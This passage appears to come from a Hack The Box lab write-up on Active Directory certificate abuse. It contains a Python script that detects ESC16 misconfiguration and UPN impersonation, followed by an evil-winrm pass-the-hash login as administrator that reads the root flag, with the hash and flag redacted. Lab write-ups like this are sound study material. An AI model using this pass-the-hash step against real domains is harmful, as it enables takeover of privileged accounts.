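# Matches indented 'Key : Value' lines; keys are letters and spaces only.
KV_RE = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")


def parse_kv(text: str) -> Dict[str, str]:
    """Collect 'Key : Value' lines into a dict (first occurrence wins)."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m and m.group(1).strip() not in out:
            out[m.group(1).strip()] = m.group(2).strip()
    return out


def esc16_findings(find_text: str) -> List[str]:
    """Flag a CA whose 'Disabled Extensions' include the SID security extension."""
    kv = parse_kv(find_text)
    disabled = kv.get("Disabled Extensions", "")
    oids = [o.strip() for o in disabled.split(",") if o.strip()]
    if NTDS_CA_SECURITY_EXT_OID not in oids:
        return []
    return [
        f"ESC16: CA '{kv.get('CA Name', '?')}' has {NTDS_CA_SECURITY_EXT_OID} "
        "(szOID_NTDS_CA_SECURITY_EXT) disabled; issued certificates carry no SID binding"
    ]


def upn_findings(account_text: str) -> List[str]:
    """Flag an account whose UPN prefix differs from its sAMAccountName,
    and separately a UPN that names a privileged account."""
    kv = parse_kv(account_text)
    sam = kv.get("sAMAccountName", "")
    upn = kv.get("userPrincipalName", "")
    prefix = upn.split("@", 1)[0]
    findings: List[str] = []
    if upn and prefix.lower() != sam.lower():
        findings.append(f"UPN mismatch: sAMAccountName '{sam}' has userPrincipalName '{upn}'")
    if prefix.lower() in PRIVILEGED_NAMES and sam.lower() not in PRIVILEGED_NAMES:
        findings.append(f"'{sam}' carries the UPN of privileged account '{prefix}'")
    return findings


def audit() -> List[str]:
    """Run both checks over the constructed samples."""
    return esc16_findings(FIND_OUTPUT) + upn_findings(ACCOUNT_OUTPUT)


if __name__ == "__main__":
    for finding in audit():
        print("[!]", finding)
```

Run it against the text files Certipy writes (`*_Certipy.txt`) and against `certipy account ... read` output for each service account; a clean CA yields no ESC16 line, and a restored UPN (Step 4) yields no mismatch.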
## Authenticate as administrator and get root.txt
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ evil-winrm -i 10.10.11.69 -u 'administrator' -H '<REDACTED ADMINISTRATOR HASH>'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
<REDACTED ROOT.TXT CONTENT>
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```